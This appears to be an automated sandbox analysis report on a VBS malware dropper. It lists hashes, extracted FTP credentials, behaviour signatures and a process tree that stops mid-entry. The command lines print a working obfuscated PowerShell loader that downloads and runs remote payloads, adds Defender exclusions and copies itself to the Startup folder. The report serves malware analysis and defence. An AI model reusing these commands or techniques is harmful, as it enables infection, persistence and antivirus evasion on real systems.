Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 08:07

General

  • Target

    bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs

  • Size

    562KB

  • MD5

    29234d373b3118d99da44ae211f227a5

  • SHA1

    f084f4248be8e1e13e4c6ddf5388e7eafc4a6b4a

  • SHA256

    bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3

  • SHA512

    d434084bf1b635b527ac6b715a8a22202387699a522c759265f6e7f01e369cefeec62c87b582a2ad29711c7524af15c5d66b45cd038732cad44df3ab3e97c1f7

  • SSDEEP

    1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFl:pP

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Blocklisted process makes network request 44 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбGUуかбdQByуかбHQуかбJwуかбgуかбCwуかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかбgуかбCwуかбIуかбуかбnуかбGgуかбdуかбB0уかбHуかбуかбcwуかб6уかбC8уかбLwBlуかбHYуかбaQByуかбHQуかбdQBhуかбGwуかбcwBlуかбHIуかбdgBpуかбGMуかбZQBzуかбHIуかбZQB2уかбGkуかбZQB3уかбHMуかбLgBjуかбG8уかбbQуかбvуかбHcуかбcуかбуかбtуかбGkуかбbgBjуかбGwуかбdQBkуかбGUуかбcwуかбvуかбGoуかбcwуかбvуかбGkуかбbgBnуかбC4уかбdуかбB4уかбHQуかбJwуかбgуかбCgуかбIуかбBdуかбF0уかбWwB0уかбGMуかбZQBqуかбGIуかбbwBbуかбCуかбуかбLуかбуかбgуかбGwуかбbуかбB1уかбG4уかбJуかбуかбgуかбCgуかбZQBrуかбG8уかбdgBuуかбEkуかбLgуかбpуかбCуかбуかбJwBJуかбFYуかбRgByуかбHуかбуかбJwуかбgуかбCgуかбZуかбBvуかбGgуかбdуかбBlуかбE0уかбdуかбBlуかбEcуかбLgуかбpуかбCcуかбMQBzуかбHMуかбYQBsуかбEMуかбLgуかбzуかбHkуかбcgBhуかбHIуかбYgBpуかбEwуかбcwBzуかбGEуかбbуかбBDуかбCcуかбKуかбBlуかбHуかбуかбeQBUуかбHQуかбZQBHуかбC4уかбKQуかбgуかбFoуかбYwBCуかбGMуかбYQуかбkуかбCуかбуかбKуかбBkуかбGEуかбbwBMуかбC4уかбbgBpуかбGEуかбbQBvуかбEQуかбdуかбBuуかбGUуかбcgByуかбHUуかбQwуかб6уかбDoуかбXQBuуかбGkуかбYQBtуかбG8уかбRуかбBwуかбHуかбуかбQQуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбOwуかбpуかбCуかбуかбKQуかбgуかбCcуかбQQуかбnуかбCуかбуかбLуかбуかбgуかбCcуかбkyE6уかбJMhJwуかбgуかбCgуかбZQBjуかбGEуかбbуかбBwуかбGUуかбUgуかбuуかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбDQуかбNgBlуかбHMуかбYQBCуかбG0уかбbwByуかбEYуかбOgуかб6уかбF0уかбdуかбByуかбGUуかбdgBuуかбG8уかбQwуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбWgBjуかбEIуかбYwBhуかбCQуかбIуかбBdуかбF0уかбWwBlуかбHQуかбeQBCуかбFsуかбOwуかбnуかбCUуかбSQBoуかбHEуかбUgBYуかбCUуかбJwуかбgуかбD0уかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかб7уかбCkуかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgBvуかбG0уかбcgBlуかбCQуかбIуかбуかб9уかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбCkуかбKуかбBlуかбHMуかбbwBwуかбHMуかбaQBkуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQуかбgуかбCcуかбdуかбB4уかбHQуかбLgуかбxуかбDуかбуかбTуかбBMуかбEQуかбLwуかбxуかбDуかбуかбLwByуかбGUуかбdуかбBwуかбHkуかбcgBjуかбHуかбуかбVQуかбvуかбHIуかбYgуかбuуかбG0уかбbwBjуかбC4уかбdуかбBhуかбHIуかбYgB2уかбGsуかбYwBzуかбGUуかбZуかбуかбuуかбHуかбуかбdуかбBmуかбEуかбуかбMQB0уかбGEуかбcgBiуかбHYуかбawBjуかбHMуかбZQBkуかбC8уかбLwуかб6уかбHуかбуかбdуかбBmуかбCcуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG8уかбbQByуかбGUуかбJуかбуかбgуかбD0уかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбDsуかбKQуかбnуかбEуかбуかбQуかбBwуかбEoуかбOуかбуかб3уかбDUуかбMQуかбyуかбG8уかбcgBwуかбHIуかбZQBwуかбG8уかбbуかбBlуかбHYуかбZQBkуかбCcуかбLуかбуかбpуかбCkуかбOQуかб0уかбCwуかбNgуかбxуかбDEуかбLуかбуかб3уかбDkуかбLуかбуかб0уかбDEуかбMQуかбsуかбDgуかбOQуかбsуかбDgуかбMQуかбxуかбCwуかбNwуかбwуかбDEуかбLуかбуかб5уかбDkуかбLуかбуかб1уかбDEуかбMQуかбsуかбDEуかбMуかбуかбxуかбCwуかбMуかбуかбwуかбDEуかбKуかбBdуかбF0уかбWwByуかбGEуかбaуかбBjуかбFsуかбIуかбBuуかбGkуかбbwBqуかбC0уかбKуかбуかбoуかбGwуかбYQBpуかбHQуかбbgBlуかбGQуかбZQByуかбEMуかбawByуかбG8уかбdwB0уかбGUуかбTgуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбIуかбB0уかбGMуかбZQBqуかбGIуかбbwуかбtуかбHcуかбZQBuуかбCуかбуかбPQуかбgуかбHMуかбbуかбBhуかбGkуかбdуかбBuуかбGUуかбZуかбBlуかбHIуかбQwуかбuуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбOwуかбyуかбDEуかбcwBsуかбFQуかбOgуかб6уかбF0уかбZQBwуかбHkуかбVуかбBsуかбG8уかбYwBvуかбHQуかбbwByуかбFуかбуかбeQB0уかбGkуかбcgB1уかбGMуかбZQBTуかбC4уかбdуかбBlуかбE4уかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGwуかбbwBjуかбG8уかбdуかбBvуかбHIуかбUуかбB5уかбHQуかбaQByуかбHUуかбYwBlуかбFMуかбOgуかб6уかбF0уかбcgBlуかбGcуかбYQBuуかбGEуかбTQB0уかбG4уかбaQBvуかбFуかбуかбZQBjуかбGkуかбdgByуかбGUуかбUwуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかб7уかбH0уかбZQB1уかбHIуかбdуかбуかбkуかбHsуかбIуかбуかб9уかбCуかбуかбawBjуかбGEуかбYgBsуかбGwуかбYQBDуかбG4уかбbwBpуかбHQуかбYQBkуかбGkуかбbуかбBhуかбFYуかбZQB0уかбGEуかбYwBpуかбGYуかбaQB0уかбHIуかбZQBDуかбHIуかбZQB2уかбHIуかбZQBTуかбDoуかбOgBdуかбHIуかбZQBnуかбGEуかбbgBhуかбE0уかбdуかбBuуかбGkуかбbwBQуかбGUуかбYwBpуかбHYуかбcgBlуかбFMуかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかбgуかбGYуかбLwуかбgуかбDуかбуかбIуかбB0уかбC8уかбIуかбByуかбC8уかбIуかбBlуかбHgуかбZQуかбuуかбG4уかбdwBvуかбGQуかбdуかбB1уかбGgуかбcwуかбgуかбDsуかбJwуかбwуかбDgуかбMQуかбgуかбHуかбуかбZQBlуかбGwуかбcwуかбnуかбCуかбуかбZуかбBuуかбGEуかбbQBtуかбG8уかбYwуかбtуかбCуかбуかбZQB4уかбGUуかбLgBsуかбGwуかбZQBoуかбHMуかбcgBlуかбHcуかбbwBwуかбDsуかбIуかбBlуかбGMуかбcgBvуかбGYуかбLQуかбgуかбCkуかбIуかбуかбnуかбHуかбуかбdQB0уかбHIуかбYQB0уかбFMуかбXуかбBzуかбG0уかбYQByуかбGcуかбbwByуかбFуかбуかбXуかбB1уかбG4уかбZQBNуかбCуかбуかбdуかбByуかбGEуかбdуかбBTуかбFwуかбcwB3уかбG8уかбZуかбBuуかбGkуかбVwBcуかбHQуかбZgBvуかбHMуかбbwByуかбGMуかбaQBNуかбFwуかбZwBuуかбGkуかбbQBhуかбG8уかбUgBcуかбGEуかбdуかбBhуかбEQуかбcуかбBwуかбEEуかбXуかбуかбnуかбCуかбуかбKwуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбCуかбуかбKуかбуかбgуかбG4уかбbwBpуかбHQуかбYQBuуかбGkуかбdуかбBzуかбGUуかбRуかбуかбtуかбCуかбуかбJwуかбlуかбEkуかбaуかбBxуかбFIуかбWуかбуかбlуかбCcуかбIуかбBtуかбGUуかбdуかбBJуかбC0уかбeQBwуかбG8уかбQwуかбgуかбDsуかбIуかбB0уかбHIуかбYQB0уかбHMуかбZQByуかбG8уかбbgуかбvуかбCуかбуかбdуかбBlуかбGkуかбdQBxуかбC8уかбIуかбBHуかбGMуかбVwBpуかбFIуかбIуかбBlуかбHgуかбZQуかбuуかбGEуかбcwB1уかбHcуかбIуかбBlуかбHgуかбZQуかбuуかбGwуかбbуかбBlуかбGgуかбcwByуかбGUуかбdwBvуかбHуかбуかбIуかбуかб7уかбCkуかбJwB1уかбHMуかбbQуかбuуかбG4уかбaQB3уかбHуかбуかбVQBcуかбCcуかбIуかбуかбrуかбCуかбуかбTgBKуかбFQуかбeуかбBEуかбCQуかбKуかбуかбgуかбD0уかбIуかбBHуかбGMуかбVwBpуかбFIуかбOwуかбpуかбCуかбуかбZQBtуかбGEуかбTgByуかбGUуかбcwBVуかбDoуかбOgBdуかбHQуかбbgBlуかбG0уかбbgBvуかбHIуかбaQB2уかбG4уかбRQBbуかбCуかбуかбKwуかбgуかбCcуかбXуかбBzуかбHIуかбZQBzуかбFUуかбXуかбуかб6уかбEMуかбJwуかбoуかбCуかбуかбPQуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбDsуかбKQуかбnуかбHUуかбcwBtуかбC4уかбbgBpуかбHcуかбcуかбBVуかбFwуかбJwуかбgуかбCsуかбIуかбBOуかбEoуかбVуかбB4уかбEQуかбJуかбуかбgуかбCwуかбQgBLуかбEwуかбUgBVуかбCQуかбKуかбBlуかбGwуかбaQBGуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG4уかбSgB5уかбFYуかбagуかбkуかбDsуかбOуかбBGуかбFQуかбVQуかб6уかбDoуかбXQBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgB0уかбHgуかбZQBUуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかбgуかбD0уかбIуかбBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбH0уかбOwуかбgуかбCkуかбJwB0уかбE8уかбTуかбBjуかбF8уかбSwBhуかбDMуかбWgBmуかбG8уかбWуかбуかбyуかбEoуかбSgByуかбFYуかбaуかбBtуかбFYуかбOQBjуかбG0уかбOQBYуかбHMуかбdQBYуかбG0уかбagуかбxуかбGcуかбMQуかбnуかбCуかбуかбKwуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбCgуかбIуかбуかб9уかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかб7уかбCуかбуかбKQуかбnуかбDIуかбNуかбB1уかбFgуかбSgBUуかбHEуかбYQBtуかбGcуかбeQBNуかбHQуかбRgB6уかбGEуかбawBQуかбFIуかбMQBxуかбF8уかбSQB2уかбEcуかбaQBYуかбE4уかбZуかбBxуかбGEуかбTgуかбxуかбCcуかбIуかбуかбrуかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбKуかбуかбgуかбD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAFAAYgBuAEUAWgAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAFAAYgBuAEUAWgAkACAAOwA=';$kahlN = $qKKzc.replace('уかб' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs');powershell $vQpeD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$ermo.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $ermo.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ermo.dispose();$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ermo.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.gni/sj/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5100
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
          4⤵
            PID:4420
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
            4⤵
            • Drops startup file
            PID:2024
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
            4⤵
              PID:3408
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
              4⤵
                PID:2316
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                4⤵
                  PID:552
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                  4⤵
                    PID:2516
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                    4⤵
                      PID:3980
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                      4⤵
                        PID:748
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                        4⤵
                          PID:1344
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                          4⤵
                            PID:1988
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                            4⤵
                              PID:1892
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                              4⤵
                                PID:3800
                              • C:\Windows\SYSTEM32\cmd.exe
                                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                4⤵
                                  PID:4192
                                • C:\Windows\SYSTEM32\cmd.exe
                                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                  4⤵
                                    PID:992
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                    4⤵
                                      PID:3372
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                      4⤵
                                        PID:964
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                        4⤵
                                          PID:3632
                                        • C:\Windows\SYSTEM32\cmd.exe
                                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                          4⤵
                                            PID:4384
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                            4⤵
                                              PID:3392
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                              4⤵
                                                PID:1816
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                4⤵
                                                  PID:400
                                                • C:\Windows\SYSTEM32\cmd.exe
                                                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                  4⤵
                                                    PID:1736
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                    4⤵
                                                      PID:452
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                      4⤵
                                                        PID:4140
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                        4⤵
                                                          PID:4568
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                          4⤵
                                                            PID:4420
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                            4⤵
                                                              PID:4804
                                                            • C:\Windows\SYSTEM32\cmd.exe
